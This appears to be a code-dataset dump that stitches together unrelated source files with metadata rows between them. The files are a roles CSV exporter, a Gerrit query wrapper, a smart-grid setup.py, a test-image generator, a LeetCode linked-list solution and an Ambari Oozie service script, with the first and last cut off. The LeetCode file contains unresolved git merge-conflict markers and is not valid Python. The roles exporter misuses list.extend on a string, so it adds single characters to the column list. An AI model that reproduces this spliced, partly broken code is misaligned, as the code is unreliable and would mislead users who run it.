JavaScript for the widget @param widget_id: the widget ID (=element ID of the person_id field) @param options: JSON-serializable dict of widget options @param i18n: translations of screen messages rendered by the client-side script, a dict {messageKey: translation} """ s3 = current.response.s3 # Static script if s3.debug: script = "/%s/static/scripts/S3/s3.ui.roles.js" % \ current.request.application else: script = "/%s/static/scripts/S3/s3.ui.roles.min.js" % \ current.request.application scripts = s3.scripts if script not in scripts: scripts.append(script) self.inject_i18n(i18n) # Widget options opts = {} if options: opts.update(options) # Widget instantiation script = '''$('#%(widget_id)s').roleManager(%(options)s)''' % \ {"widget_id": widget_id, "options": json.dumps(opts, separators=SEPARATORS), } jquery_ready = s3.jquery_ready if script not in jquery_ready: jquery_ready.append(script) # ------------------------------------------------------------------------- @staticmethod def inject_i18n(labels): """ Inject translations for screen messages rendered by the client-side script @param labels: dict of translations {messageKey: translation} """ strings = ['''i18n.%s="%s"''' % (k, s3_str(v)) for k, v in labels.items()] current.response.s3.js_global.append("\n".join(strings)) # ============================================================================= class S3RolesExport(object): """ Roles Exporter """ def __init__(self, resource): """ Constructor @param resource: the role resource (auth_group) with REST filters; or None to export all groups """ db = current.db auth = current.auth # Optional columns self.col_hidden = False self.col_protected = False self.col_entity = False # Look up the roles gtable = auth.settings.table_group fields = ("id", "uuid", "role", "description", "hidden", "protected", "system", ) if resource and resource.tablename == str(gtable): roles = resource.select(fields, as_rows=True) else: query = (gtable.deleted == False) roles = db(query).select(*fields) # Generate roles dict role_dicts = {} for role in roles: role_dict = {"uid": role.uuid, "role": role.role, "description": role.description, } if role.hidden: self.col_hidden = True role_dict["hidden"] = "true" if role.protected and not role.system: self.col_protected = True role_dict["protected"] = "true" role_dicts[role.id] = role_dict self.roles = role_dicts # Look up all rules, ordered by UID, controller, function, table rtable = auth.permission.table query = (rtable.group_id.belongs(set(role_dicts.keys()))) & \ (rtable.deleted == False) rules = db(query).select(rtable.id, rtable.group_id, rtable.controller, rtable.function, rtable.tablename, rtable.uacl, rtable.oacl, rtable.entity, ) self.rules = rules # Look up all org entities entities = set() for rule in rules: entity = rule.entity if entity is not None: self.col_entity = True entities.add(entity) otable = current.s3db.org_organisation query = (otable.pe_id.belongs(entities)) & \ (otable.deleted == False) self.orgs = db(query).select(otable.pe_id, otable.name, ).as_dict(key="pe_id") # ------------------------------------------------------------------------- def as_csv(self): """ Export the current roles and permissions as CSV, suitable for prepop (see S3BulkImporter.import_role) @returns: a StringIO containing the CSV """ import csv # Optional columns col_protected = self.col_protected col_hidden = self.col_hidden col_entity = self.col_entity # Role fields fieldnames = ["uid", "role", "description"] if col_hidden: fieldnames.append("hidden") if col_protected: fieldnames.append("protected") # Rule fields fieldnames.extend(["controller", "function", "table", "uacl", "oacl"]) if col_entity: fieldnames.extend("entity") # Helper to get the role UID for a rule role_dicts = self.roles def get_uid(group_id): role_dict = role_dicts.get(group_id) return role_dict.get("uid") if role_dict else None # Sort the rules rules = sorted(self.rules, key = lambda rule: (get_uid(rule.group_id), rule.controller or "zzzzzz", rule.function or "", rule.tablename or "", )) # Create the CSV f = StringIO() writer = csv.DictWriter(f, fieldnames=fieldnames) writer.writeheader() # Write the rules to the CSV orgs = self.orgs encode_permissions = self.encode_permissions for rule in rules: role_dict = role_dicts.get(rule.group_id) if not role_dict: continue rule_dict = {} # The entity column (optional) if col_entity: entity = rule.entity if entity is not None: if entity == 0: rule_dict["entity"] = "any" else: org = orgs.get(entity) if org: rule_dict["entity"] = org else: continue # The target columns (controller, function, table) if rule.tablename: rule_dict["table"] = rule.tablename else: if rule.controller: rule_dict["controller"] = rule.controller if rule.function: rule_dict["function"] = rule.function # The permission columns (uacl, oacl) uacl = encode_permissions(rule.uacl, explicit_none=True) if uacl: rule_dict["uacl"] = uacl oacl = encode_permissions(rule.oacl & ~(rule.uacl)) if oacl: rule_dict["oacl"] = oacl # Add role columns rule_dict.update(role_dict) # Write the rule writer.writerow(rule_dict) f.seek(0) return f # ------------------------------------------------------------------------- @staticmethod def encode_permissions(permissions, explicit_none=False): """ Encodes a permission bitmap as string, using the permission labels from S3Permission.PERMISSION_OPTS @param permissions: the permission bitmap @param explicit_none: return "NONE" if no permission bit set (otherwise returns None) """ if not permissions: if explicit_none: return "NONE" else: return None opts = current.auth.permission.PERMISSION_OPTS labels = [] for bit in opts: if permissions & bit: labels.append(opts[bit]) return "|".join(labels) # END =========================================================================
mit
2,148,195,638,398,239,000
34.396073
119
0.441798
false
4.9062
false
false
false
berrange/gerrymander
gerrymander/operations.py
1
5420
# # Copyright (C) 2014 Red Hat, Inc # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from gerrymander.model import ModelChange from gerrymander.model import ModelEvent class OperationBase(object): def __init__(self, client): self.client = client class OperationQuery(OperationBase): PATCHES_NONE = "none" PATCHES_CURRENT = "current" PATCHES_ALL = "all" STATUS_SUBMITTED = "submitted" STATUS_REVIEWED = "reviewed" STATUS_MERGED = "merged" STATUS_ABANDONED = "abandoned" STATUS_OPEN = "open" STATUS_CLOSED = "closed" def __init__(self, client, terms={}, rawquery=None, patches=PATCHES_NONE, approvals=False, files=False, comments=False, deps=False): OperationBase.__init__(self, client) self.terms = terms self.rawquery = rawquery self.patches = patches self.approvals = approvals self.files = files self.comments = comments self.deps = deps if self.patches == OperationQuery.PATCHES_NONE: if self.approvals: raise Exception("approvals cannot be requested without patches") if self.files: raise Exception("files cannot be requested without patches") def get_args(self, limit=None, offset=None, sortkey=None): args = ["query", "--format=JSON"] if self.patches == OperationQuery.PATCHES_CURRENT: args.append("--current-patch-set") elif self.patches == OperationQuery.PATCHES_ALL: args.append("--patch-sets") if self.approvals: args.append("--all-approvals") if self.files: args.append("--files") if self.comments: args.append("--comments") if self.deps: args.append("--dependencies") clauses = [] if offset is not None: args.append("--start") args.append("%d" % offset) if limit is not None: clauses.append("limit:" + str(limit)) if sortkey is not None: clauses.append("resume_sortkey:" + sortkey) if self.rawquery is not None: clauses.append("(" + self.rawquery + ")") terms = list(self.terms.keys()) terms.sort() for term in terms: negateAll = False terms = self.terms[term] if len(terms) > 0 and terms[0] == "!": negateAll = True terms = terms[1:] if len(terms) == 0: continue subclauses = [] for value in terms: subclauses.append("%s:%s" % (term, value)) clause = " OR ".join(subclauses) if negateAll: clause = "( NOT ( " + clause + " ) )" else: clause = "( " + clause + " )" clauses.append(clause) args.append(" AND ".join(clauses)) return args def run(self, cb, limit=None): class tracker(object): def __init__(self): self.gotany = True self.count = 0 self.sortkey = None self.has_more = False c = tracker() def mycb(line): if 'rowCount' in line: # New gerrit sets 'moreChanges' if 'moreChanges' in line: c.has_more = line['moreChanges'] return if 'type' in line and line['type'] == "error": raise Exception(line['message']) change = ModelChange.from_json(line) # Old gerrit sets 'sortKey' if "sortKey" in line: c.sortkey = line["sortKey"] c.gotany = True c.count = c.count + 1 cb(change) if limit is None: while c.gotany: c.gotany = False offset = None if c.has_more: offset = c.count self.client.run(self.get_args(500, offset, c.sortkey), mycb) if not c.sortkey and not c.has_more: break else: while c.count < limit and c.gotany: want = limit - c.count if want > 500: want = 500 c.gotany = False offset = None if c.has_more: offset = c.count self.client.run(self.get_args(want, offset, c.sortkey), mycb) if not c.sortkey and not c.has_more: break return 0 class OperationWatch(OperationBase): def __init__(self, client): OperationBase.__init__(self, client) def run(self, cb): def mycb(line): event = ModelEvent.from_json(line) if event: cb(event) return self.client.run(["stream-events"], mycb)
apache-2.0
132,657,920,464,158,480
31.071006
80
0.533948
false
4.185328
false
false
false
Hawaii-Smart-Energy-Project/Maui-Smart-Grid
setup.py
1
4642
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Setup script for MSG Data Processing and Operations. Additional file-based inclusions can be found in MANIFEST.in. The distribution archive is created as a source distribution, http://docs.python.org/2/distutils/sourcedist.html, using python setup.py sdist Installation is performed using python setup.py install [--prefix=${LIBRARY_PATH} --exec-prefix=${BIN_PATH] where the path arguments within the square brackets are optional. """ __author__ = 'Daniel Zhang (張道博)' __copyright__ = 'Copyright (c) 2014, University of Hawaii Smart Energy Project' __license__ = 'https://raw.github' \ '.com/Hawaii-Smart-Energy-Project/Maui-Smart-Grid/master/BSD' \ '-LICENSE.txt' from distutils.core import setup setup(name = 'Maui-Smart-Grid', version = '1.0.0', description = 'Data Processing and Data Operations for the Maui Smart ' 'Grid Project.', long_description = 'The University of Hawaii at Manoa was tasked with ' 'maintaining a data repository for use by analysts ' 'for the Maui Smart Grid (http://www.mauismartgrid' '.com) energy sustainability project through the ' 'Hawaii Natural Energy Institute (http://www.hnei' '.hawaii.edu). This software provides the data ' 'processing and operational resources necessary to ' 'accomplish this task. Source data arrives in ' 'multiple formats including XML, tab-separated ' 'values, and comma-separated values. Issues for this' ' project are tracked at the Hawaii Smart Energy ' 'Project YouTRACK instance (' 'http://smart-energy-project.myjetbrains' '.com/youtrack/rest/agile).', author = 'Daniel Zhang (張道博)', author_email = 'See https://github.com/dz1111', url = 'https://github.com/Hawaii-Smart-Energy-Project/Maui-Smart-Grid', license = 'https://raw.github' '.com/Hawaii-Smart-Energy-Project/Maui-Smart-Grid/master/BSD' '-LICENSE.txt', platforms = 'OS X, Linux', package_dir = {'': 'src'}, py_modules = [ 'filelock', 'meco_data_autoloader', 'meco_db_delete', 'meco_db_insert', 'meco_db_read', 'meco_dupe_check', 'meco_fk', 'meco_mapper', 'meco_plotting', 'meco_pv_readings_in_nonpv_mlh_notifier', 'meco_xml_parser', 'msg_aggregated_data', 'msg_configer', 'msg_data_aggregator', 'msg_data_verifier', 'msg_db_connector', 'msg_db_exporter', 'msg_db_util', 'msg_file_util', 'msg_logger', 'msg_math_util', 'msg_noaa_weather_data_dupe_checker', 'msg_noaa_weather_data_inserter', 'msg_noaa_weather_data_parser', 'msg_noaa_weather_data_util', 'msg_notifier', 'msg_python_util', 'msg_time_util', 'msg_types' ], scripts = [ 'src/automated-scripts/aggregateNewData.py', 'src/automated-scripts/autoloadNewMECOData.py', 'src/automated-scripts/exportDBsToCloud.py', 'src/automated-scripts/insertCompressedNOAAWeatherData.py', 'src/automated-scripts/insertMECOEnergyData.py', 'src/automated-scripts/insertSingleMECOEnergyDataFile.py', 'src/automated-scripts/reportExportSummary.py', 'src/automated-scripts/retrieveNOAAWeatherData.py', 'src/static-data-insert/insertCleanSCADAVoltageAndTapData.py', 'src/static-data-insert/insertLocationRecords.py', 'src/static-data-insert/insertMECOMeterLocationHistoryData.py', 'src/static-data-insert/insertMeterRecords.py', 'src/static-data-insert/insertNRELIrradianceData.py', 'src/static-data-insert/insertPowerMeterEvents.py', 'src/static-data-insert/insertSCADAWeatherData.py' ])
bsd-3-clause
7,457,005,088,255,912,000
43.951456
80
0.540605
false
4.050744
false
false
false
ctrevino/DIGITS
digits/dataset/images/classification/test_imageset_creator.py
1
2642
#!/usr/bin/env python """ Functions for creating temporary datasets Used in test_views """ import os import time import argparse from collections import defaultdict import numpy as np import PIL.Image IMAGE_SIZE = 10 IMAGE_COUNT = 10 # per category def create_classification_imageset(folder, image_size=None, image_count=None): """ Creates a folder of folders of images for classification """ if image_size is None: image_size = IMAGE_SIZE if image_count is None: image_count = IMAGE_COUNT # Stores the relative path of each image of the dataset paths = defaultdict(list) for class_name, pixel_index, rotation in [ ('red-to-right', 0, 0), ('green-to-top', 1, 90), ('blue-to-left', 2, 180), ]: os.makedirs(os.path.join(folder, class_name)) colors = np.linspace(200, 255, image_count) for i, color in enumerate(colors): pixel = [0, 0, 0] pixel[pixel_index] = color pil_img = _create_gradient_image(image_size, (0, 0, 0), pixel, rotation) img_path = os.path.join(class_name, str(i) + '.png') pil_img.save(os.path.join(folder, img_path)) paths[class_name].append(img_path) return paths def _create_gradient_image(size, color_from, color_to, rotation): """ Make an image with a color gradient with a specific rotation """ # create gradient rgb_arrays = [np.linspace(color_from[x], color_to[x], size).astype('uint8') for x in range(3)] gradient = np.concatenate(rgb_arrays) # extend to 2d picture = np.repeat(gradient, size) picture.shape = (3, size, size) # make image and rotate image = PIL.Image.fromarray(picture.T) image = image.rotate(rotation) return image if __name__ == '__main__': parser = argparse.ArgumentParser(description='Create-Imageset tool - DIGITS') ### Positional arguments parser.add_argument('folder', help='Where to save the images' ) ### Optional arguments parser.add_argument('-s', '--image_size', type=int, help='Size of the images') parser.add_argument('-c', '--image_count', type=int, help='How many images') args = vars(parser.parse_args()) print 'Creating images at "%s" ...' % args['folder'] start_time = time.time() create_classification_imageset(args['folder'], image_size=args['image_size'], image_count=args['image_count'], ) print 'Done after %s seconds' % (time.time() - start_time,)
bsd-3-clause
678,515,116,100,906,200
25.686869
98
0.603331
false
3.731638
false
false
false
menghanY/LeetCode-Python
LinkedList/SwapNodesInPairs.py
1
1237
<<<<<<< HEAD from ListNode import ListNode class Solution(object): def swapPairs(self, head): if not head or not head.next : return head resNode = head.next while head : pre = head head = head.next.next ======= # https://leetcode.com/problems/swap-nodes-in-pairs/ from ListNode import ListNode class Solution(object): def swapPairs(self, head): if not head: return [] if not head.next: return head r_head = ListNode(0) l = r_head l.next = head m = head r = head.next while m or r: if not r: return r_head.next else: m.next = r.next r.next = m l.next = r m = m.next r = r.next.next l = l.next.next if r: r = r.next return r_head.next four = ListNode(4) three = ListNode(3) two = ListNode(2) one = ListNode(1) one.next = two two.next = three three.next = four # while one : # print(one.val) # one = one.next Solution().swapPairs(one) >>>>>>> 83d0b11e2eaab6e16fd7a88d6e65f2bdbd6dbe15
mit
8,618,302,866,557,902,000
19.278689
52
0.497171
false
3.484507
false
false
false
alexryndin/ambari
ambari-server/src/main/resources/common-services/OOZIE/4.0.0.2.0/package/scripts/oozie.py
1
23458
#!/usr/bin/env python """ Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ # Python Imports import os import re # Resource Management Imports from resource_management.core.resources.service import ServiceConfig from resource_management.core.resources.system import Directory, Execute, File from resource_management.core.source import DownloadSource from resource_management.core.source import InlineTemplate from resource_management.core.source import Template from resource_management.libraries.functions.format import format from resource_management.libraries.functions.default import default from resource_management.libraries.functions import StackFeature from resource_management.libraries.functions.version import format_stack_version from resource_management.libraries.functions.stack_features import check_stack_feature from resource_management.libraries.functions.oozie_prepare_war import prepare_war from resource_management.libraries.functions.copy_tarball import get_current_version from resource_management.libraries.resources.xml_config import XmlConfig from resource_management.libraries.script.script import Script from resource_management.libraries.functions.security_commons import update_credential_provider_path from resource_management.core.resources.packaging import Package from resource_management.core.shell import as_user, as_sudo, call from resource_management.core.exceptions import Fail from resource_management.libraries.functions.setup_atlas_hook import has_atlas_in_cluster, setup_atlas_hook from ambari_commons.constants import SERVICE, UPGRADE_TYPE_NON_ROLLING, UPGRADE_TYPE_ROLLING from resource_management.libraries.functions.constants import Direction from ambari_commons.os_family_impl import OsFamilyFuncImpl, OsFamilyImpl from ambari_commons import OSConst from ambari_commons.inet_utils import download_file from resource_management.core import Logger @OsFamilyFuncImpl(os_family=OSConst.WINSRV_FAMILY) def oozie(is_server=False, upgrade_type=None): import params from status_params import oozie_server_win_service_name XmlConfig("oozie-site.xml", conf_dir=params.oozie_conf_dir, configurations=params.config['configurations']['oozie-site'], owner=params.oozie_user, mode='f', configuration_attributes=params.config['configuration_attributes']['oozie-site'] ) File(os.path.join(params.oozie_conf_dir, "oozie-env.cmd"), owner=params.oozie_user, content=InlineTemplate(params.oozie_env_cmd_template) ) Directory(params.oozie_tmp_dir, owner=params.oozie_user, create_parents = True, ) if is_server: # Manually overriding service logon user & password set by the installation package ServiceConfig(oozie_server_win_service_name, action="change_user", username = params.oozie_user, password = Script.get_password(params.oozie_user)) download_file(os.path.join(params.config['hostLevelParams']['jdk_location'], "sqljdbc4.jar"), os.path.join(params.oozie_root, "extra_libs", "sqljdbc4.jar") ) webapps_sqljdbc_path = os.path.join(params.oozie_home, "oozie-server", "webapps", "oozie", "WEB-INF", "lib", "sqljdbc4.jar") if os.path.isfile(webapps_sqljdbc_path): download_file(os.path.join(params.config['hostLevelParams']['jdk_location'], "sqljdbc4.jar"), webapps_sqljdbc_path ) download_file(os.path.join(params.config['hostLevelParams']['jdk_location'], "sqljdbc4.jar"), os.path.join(params.oozie_home, "share", "lib", "oozie", "sqljdbc4.jar") ) download_file(os.path.join(params.config['hostLevelParams']['jdk_location'], "sqljdbc4.jar"), os.path.join(params.oozie_home, "temp", "WEB-INF", "lib", "sqljdbc4.jar") ) # TODO: see if see can remove this @OsFamilyFuncImpl(os_family=OsFamilyImpl.DEFAULT) def oozie(is_server=False, upgrade_type=None): import params if is_server: params.HdfsResource(params.oozie_hdfs_user_dir, type="directory", action="create_on_execute", owner=params.oozie_user, mode=params.oozie_hdfs_user_mode ) params.HdfsResource(None, action="execute") Directory(params.conf_dir, create_parents = True, owner = params.oozie_user, group = params.user_group ) params.oozie_site = update_credential_provider_path(params.oozie_site, 'oozie-site', os.path.join(params.conf_dir, 'oozie-site.jceks'), params.oozie_user, params.user_group ) XmlConfig("oozie-site.xml", conf_dir = params.conf_dir, configurations = params.oozie_site, configuration_attributes=params.config['configuration_attributes']['oozie-site'], owner = params.oozie_user, group = params.user_group, mode = 0664 ) File(format("{conf_dir}/oozie-env.sh"), owner=params.oozie_user, content=InlineTemplate(params.oozie_env_sh_template), group=params.user_group, ) # On some OS this folder could be not exists, so we will create it before pushing there files Directory(params.limits_conf_dir, create_parents=True, owner='root', group='root' ) File(os.path.join(params.limits_conf_dir, 'oozie.conf'), owner='root', group='root', mode=0644, content=Template("oozie.conf.j2") ) if (params.log4j_props != None): File(format("{params.conf_dir}/oozie-log4j.properties"), mode=0644, group=params.user_group, owner=params.oozie_user, content=InlineTemplate(params.log4j_props) ) elif (os.path.exists(format("{params.conf_dir}/oozie-log4j.properties"))): File(format("{params.conf_dir}/oozie-log4j.properties"), mode=0644, group=params.user_group, owner=params.oozie_user ) if params.stack_version_formatted and check_stack_feature(StackFeature.OOZIE_ADMIN_USER, params.stack_version_formatted): File(format("{params.conf_dir}/adminusers.txt"), mode=0644, group=params.user_group, owner=params.oozie_user, content=Template('adminusers.txt.j2', oozie_admin_users=params.oozie_admin_users) ) else: File ( format("{params.conf_dir}/adminusers.txt"), owner = params.oozie_user, group = params.user_group ) if params.jdbc_driver_name == "com.mysql.jdbc.Driver" or \ params.jdbc_driver_name == "com.microsoft.sqlserver.jdbc.SQLServerDriver" or \ params.jdbc_driver_name == "org.postgresql.Driver" or \ params.jdbc_driver_name == "oracle.jdbc.driver.OracleDriver": File(format("/usr/lib/ambari-agent/{check_db_connection_jar_name}"), content = DownloadSource(format("{jdk_location}{check_db_connection_jar_name}")), ) pass oozie_ownership() if is_server: oozie_server_specific(upgrade_type) def oozie_ownership(): import params File ( format("{conf_dir}/hadoop-config.xml"), owner = params.oozie_user, group = params.user_group ) File ( format("{conf_dir}/oozie-default.xml"), owner = params.oozie_user, group = params.user_group ) Directory ( format("{conf_dir}/action-conf"), owner = params.oozie_user, group = params.user_group ) File ( format("{conf_dir}/action-conf/hive.xml"), owner = params.oozie_user, group = params.user_group ) def get_oozie_ext_zip_source_paths(upgrade_type, params): """ Get an ordered list of Oozie ext zip file paths from the source stack. :param upgrade_type: Upgrade type will be None if not in the middle of a stack upgrade. :param params: Expected to contain fields for ext_js_path, upgrade_direction, source_stack_name, and ext_js_file :return: Source paths to use for Oozie extension zip file """ # Default to /usr/share/$TARGETSTACK-oozie/ext-2.2.zip paths = [] source_ext_js_path = params.ext_js_path # Preferred location used by HDP and BigInsights 4.2.5 if upgrade_type is not None and params.upgrade_direction == Direction.UPGRADE: source_ext_js_path = "/usr/share/" + params.source_stack_name.upper() + "-oozie/" + params.ext_js_file paths.append(source_ext_js_path) # Alternate location used by BigInsights 4.2.0 when migrating to another stack. paths.append("/var/lib/oozie/" + params.ext_js_file) return paths def oozie_server_specific(upgrade_type): import params no_op_test = as_user(format("ls {pid_file} >/dev/null 2>&1 && ps -p `cat {pid_file}` >/dev/null 2>&1"), user=params.oozie_user) File(params.pid_file, action="delete", not_if=no_op_test ) oozie_server_directories = [format("{oozie_home}/{oozie_tmp_dir}"), params.oozie_pid_dir, params.oozie_log_dir, params.oozie_tmp_dir, params.oozie_data_dir, params.oozie_lib_dir, params.oozie_webapps_dir, params.oozie_webapps_conf_dir, params.oozie_server_dir] Directory( oozie_server_directories, owner = params.oozie_user, group = params.user_group, mode = 0755, create_parents = True, cd_access="a", ) Directory(params.oozie_libext_dir, create_parents = True, ) hashcode_file = format("{oozie_home}/.hashcode") skip_recreate_sharelib = format("test -f {hashcode_file} && test -d {oozie_home}/share") untar_sharelib = ('tar','-xvf',format('{oozie_home}/oozie-sharelib.tar.gz'),'-C',params.oozie_home) Execute( untar_sharelib, # time-expensive not_if = format("{no_op_test} || {skip_recreate_sharelib}"), sudo = True, ) configure_cmds = [] # Default to /usr/share/$TARGETSTACK-oozie/ext-2.2.zip as the first path source_ext_zip_paths = get_oozie_ext_zip_source_paths(upgrade_type, params) # Copy the first oozie ext-2.2.zip file that is found. # This uses a list to handle the cases when migrating from some versions of BigInsights to HDP. if source_ext_zip_paths is not None: for source_ext_zip_path in source_ext_zip_paths: if os.path.isfile(source_ext_zip_path): configure_cmds.append(('cp', source_ext_zip_path, params.oozie_libext_dir)) configure_cmds.append(('chown', format('{oozie_user}:{user_group}'), format('{oozie_libext_dir}/{ext_js_file}'))) Execute(configure_cmds, not_if=no_op_test, sudo=True, ) break Directory(params.oozie_webapps_conf_dir, owner = params.oozie_user, group = params.user_group, recursive_ownership = True, recursion_follow_links = True, ) # download the database JAR download_database_library_if_needed() #falcon el extension if params.has_falcon_host: Execute(format('{sudo} cp {falcon_home}/oozie/ext/falcon-oozie-el-extension-*.jar {oozie_libext_dir}'), not_if = no_op_test) Execute(format('{sudo} chown {oozie_user}:{user_group} {oozie_libext_dir}/falcon-oozie-el-extension-*.jar'), not_if = no_op_test) if params.lzo_enabled and len(params.all_lzo_packages) > 0: Package(params.all_lzo_packages, retry_on_repo_unavailability=params.agent_stack_retry_on_unavailability, retry_count=params.agent_stack_retry_count) Execute(format('{sudo} cp {hadoop_lib_home}/hadoop-lzo*.jar {oozie_lib_dir}'), not_if = no_op_test, ) prepare_war(params) File(hashcode_file, mode = 0644, ) if params.stack_version_formatted and check_stack_feature(StackFeature.OOZIE_CREATE_HIVE_TEZ_CONFIGS, params.stack_version_formatted): # Create hive-site and tez-site configs for oozie Directory(params.hive_conf_dir, create_parents = True, owner = params.oozie_user, group = params.user_group ) if 'hive-site' in params.config['configurations']: hive_site_config = update_credential_provider_path(params.config['configurations']['hive-site'], 'hive-site', os.path.join(params.hive_conf_dir, 'hive-site.jceks'), params.oozie_user, params.user_group ) XmlConfig("hive-site.xml", conf_dir=params.hive_conf_dir, configurations=hive_site_config, configuration_attributes=params.config['configuration_attributes']['hive-site'], owner=params.oozie_user, group=params.user_group, mode=0644 ) if 'tez-site' in params.config['configurations']: XmlConfig( "tez-site.xml", conf_dir = params.hive_conf_dir, configurations = params.config['configurations']['tez-site'], configuration_attributes=params.config['configuration_attributes']['tez-site'], owner = params.oozie_user, group = params.user_group, mode = 0664 ) # If Atlas is also installed, need to generate Atlas Hive hook (hive-atlas-application.properties file) in directory # {stack_root}/{current_version}/atlas/hook/hive/ # Because this is a .properties file instead of an xml file, it will not be read automatically by Oozie. # However, should still save the file on this host so that can upload it to the Oozie Sharelib in DFS. if has_atlas_in_cluster(): atlas_hook_filepath = os.path.join(params.hive_conf_dir, params.atlas_hook_filename) Logger.info("Has atlas in cluster, will save Atlas Hive hook into location %s" % str(atlas_hook_filepath)) setup_atlas_hook(SERVICE.HIVE, params.hive_atlas_application_properties, atlas_hook_filepath, params.oozie_user, params.user_group) Directory(params.oozie_server_dir, owner = params.oozie_user, group = params.user_group, recursive_ownership = True, ) if params.security_enabled: File(os.path.join(params.conf_dir, 'zkmigrator_jaas.conf'), owner=params.oozie_user, group=params.user_group, content=Template("zkmigrator_jaas.conf.j2") ) def __parse_sharelib_from_output(output): """ Return the parent directory of the first path from the output of the "oozie admin -shareliblist command $comp" Output will match pattern like: Potential errors [Available ShareLib] hive hdfs://server:8020/user/oozie/share/lib/lib_20160811235630/hive/file1.jar hdfs://server:8020/user/oozie/share/lib/lib_20160811235630/hive/file2.jar """ if output is not None: pattern = re.compile(r"\[Available ShareLib\]\n\S*?\n(.*share.*)", re.IGNORECASE) m = pattern.search(output) if m and len(m.groups()) == 1: jar_path = m.group(1) # Remove leading/trailing spaces and get the containing directory sharelib_dir = os.path.dirname(jar_path.strip()) return sharelib_dir return None def copy_atlas_hive_hook_to_dfs_share_lib(upgrade_type=None, upgrade_direction=None): """ If the Atlas Hive Hook direcotry is present, Atlas is installed, and this is the first Oozie Server, then copy the entire contents of that directory to the Oozie Sharelib in DFS, e.g., /usr/$stack/$current_version/atlas/hook/hive/ -> hdfs:///user/oozie/share/lib/lib_$timetamp/hive :param upgrade_type: If in the middle of a stack upgrade, the type as UPGRADE_TYPE_ROLLING or UPGRADE_TYPE_NON_ROLLING :param upgrade_direction: If in the middle of a stack upgrade, the direction as Direction.UPGRADE or Direction.DOWNGRADE. """ import params # Calculate the effective version since this code can also be called during EU/RU in the upgrade direction. effective_version = params.stack_version_formatted if upgrade_type is None else format_stack_version(params.version) if not check_stack_feature(StackFeature.ATLAS_HOOK_SUPPORT, effective_version): return # Important that oozie_server_hostnames is sorted by name so that this only runs on a single Oozie server. if not (len(params.oozie_server_hostnames) > 0 and params.hostname == params.oozie_server_hostnames[0]): Logger.debug("Will not attempt to copy Atlas Hive hook to DFS since this is not the first Oozie Server " "sorted by hostname.") return if not has_atlas_in_cluster(): Logger.debug("Will not attempt to copy Atlas Hve hook to DFS since Atlas is not installed on the cluster.") return if upgrade_type is not None and upgrade_direction == Direction.DOWNGRADE: Logger.debug("Will not attempt to copy Atlas Hve hook to DFS since in the middle of Rolling/Express upgrade " "and performing a Downgrade.") return current_version = get_current_version() atlas_hive_hook_dir = format("{stack_root}/{current_version}/atlas/hook/hive/") if not os.path.exists(atlas_hive_hook_dir): Logger.error(format("ERROR. Atlas is installed in cluster but this Oozie server doesn't " "contain directory {atlas_hive_hook_dir}")) return atlas_hive_hook_impl_dir = os.path.join(atlas_hive_hook_dir, "atlas-hive-plugin-impl") num_files = len([name for name in os.listdir(atlas_hive_hook_impl_dir) if os.path.exists(os.path.join(atlas_hive_hook_impl_dir, name))]) Logger.info("Found %d files/directories inside Atlas Hive hook impl directory %s"% (num_files, atlas_hive_hook_impl_dir)) # This can return over 100 files, so take the first 5 lines after "Available ShareLib" # Use -oozie http(s):localhost:{oozie_server_admin_port}/oozie as oozie-env does not export OOZIE_URL command = format(r'source {conf_dir}/oozie-env.sh ; oozie admin -oozie {oozie_base_url} -shareliblist hive | grep "\[Available ShareLib\]" -A 5') try: code, out = call(command, user=params.oozie_user, tries=10, try_sleep=5, logoutput=True) if code == 0 and out is not None: hive_sharelib_dir = __parse_sharelib_from_output(out) if hive_sharelib_dir is None: raise Fail("Could not parse Hive sharelib from output.") Logger.info("Parsed Hive sharelib = %s and will attempt to copy/replace %d files to it from %s" % (hive_sharelib_dir, num_files, atlas_hive_hook_impl_dir)) params.HdfsResource(hive_sharelib_dir, type="directory", action="create_on_execute", source=atlas_hive_hook_impl_dir, user=params.hdfs_user, owner=params.oozie_user, group=params.hdfs_user, mode=0755, recursive_chown=True, recursive_chmod=True, replace_existing_files=True ) Logger.info("Copying Atlas Hive hook properties file to Oozie Sharelib in DFS.") atlas_hook_filepath_source = os.path.join(params.hive_conf_dir, params.atlas_hook_filename) atlas_hook_file_path_dest_in_dfs = os.path.join(hive_sharelib_dir, params.atlas_hook_filename) params.HdfsResource(atlas_hook_file_path_dest_in_dfs, type="file", source=atlas_hook_filepath_source, action="create_on_execute", owner=params.oozie_user, group=params.hdfs_user, mode=0755, replace_existing_files=True ) params.HdfsResource(None, action="execute") # Update the sharelib after making any changes # Use -oozie http(s):localhost:{oozie_server_admin_port}/oozie as oozie-env does not export OOZIE_URL command = format("source {conf_dir}/oozie-env.sh ; oozie admin -oozie {oozie_base_url} -sharelibupdate") code, out = call(command, user=params.oozie_user, tries=5, try_sleep=5, logoutput=True) if code == 0 and out is not None: Logger.info("Successfully updated the Oozie ShareLib") else: raise Exception("Could not update the Oozie ShareLib after uploading the Atlas Hive hook directory to DFS. " "Code: %s" % str(code)) else: raise Exception("Code is non-zero or output is empty. Code: %s" % str(code)) except Fail, e: Logger.error("Failed to get Hive sharelib directory in DFS. %s" % str(e)) def download_database_library_if_needed(target_directory = None): """ Downloads the library to use when connecting to the Oozie database, if necessary. The library will be downloaded to 'params.target' unless otherwise specified. :param target_directory: the location where the database library will be downloaded to. :return: """ import params jdbc_drivers = ["com.mysql.jdbc.Driver", "com.microsoft.sqlserver.jdbc.SQLServerDriver", "oracle.jdbc.driver.OracleDriver","sap.jdbc4.sqlanywhere.IDriver"] # check to see if the JDBC driver name is in the list of ones that need to # be downloaded if params.jdbc_driver_name not in jdbc_drivers or not params.jdbc_driver_jar: return if params.previous_jdbc_jar and os.path.isfile(params.previous_jdbc_jar): 